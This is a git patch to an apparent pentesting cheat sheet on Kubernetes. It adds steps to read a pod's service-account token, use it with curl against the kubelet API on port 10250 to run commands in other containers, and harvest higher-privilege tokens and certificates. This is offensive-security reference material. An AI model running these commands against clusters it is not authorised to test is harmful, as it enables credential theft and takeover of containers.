From 7c0874c0f33a684f8357e4bc39c523f1784f1b41 Mon Sep 17 00:00:00 2001
From: whx
Date: Tue, 6 Sep 2022 22:02:37 +0200
Subject: [PATCH] added enumeration with elevate token

---
 enumeration/docs/kubectl.md | 35 ++++++++++++++++++++++++++++++++++-
 1 file changed, 34 insertions(+), 1 deletion(-)

diff --git a/enumeration/docs/kubectl.md b/enumeration/docs/kubectl.md
index 1ccf8f3..6510779 100644
--- a/enumeration/docs/kubectl.md
+++ b/enumeration/docs/kubectl.md
@@ -21,7 +21,7 @@ kubectl get secret -o json
 kubectl describe secrets -o 'json'
 ```
 ## Abuse Token
-* Inside a pod the service token(jwt) can be found under `/var/run/secrets/kubernetes.io/serviceaccount/token`
+* Inside a pod the service token(jwt) can be found under `/var/run/secrets/kubernetes.io/serviceaccount/token`
 * By change of an LFI extract the token and
 ```sh
 kubectl auth can-i --list --token=$TOKEN
@@ -29,6 +29,37 @@ kubectl get pods --token=$TOKEN
 kubectl exec -it --token=$TOKEN -- /bin/sh
 ```
 
+* __Do not copy the token around, it will end in a carfuffle of some truncated string most of the time. Just do it in the following way and spare the pain for another day__
+```
+TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
+```
+
+### Elevate Permissions with found token
+
+* If a token has been found but its permissions on other containers can not be used through kubectl directly, use curl
+```sh
+curl -k -H "Authorization: Bearer $TOKEN" --data "cmd=id" https://$K8_IP:10250/run/$NAMESPACE/$POD/$CONTAINER
+```
+ * Find namespace and pods
+```sh
+kubectl get pods -A
+```
+ * Find name of container inside the pod description under `ContainerStatuses/name`
+```sh
+kubectl get pod $POD -n $NAMESPACE -o yaml
+```
+
+* Interesting find in any high priv container are
+```sh
+/run/secrets/kubernetes.io/serviceaccount/token
+/run/secrets/kubernetes.io/serviceaccount/ca.crt
+```
+
+* Enumerate again with the new found token
+```sh
+kubectl auth can-i --list
+```
+
 
 ## Create Pods
 * Use [BishopFox's BadPods](https://github.com/BishopFox/badPods.git)
@@ -46,3 +77,5 @@ kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
 ```sh
 kubectl exec -it -n -- /bin/bash
 ```
+
+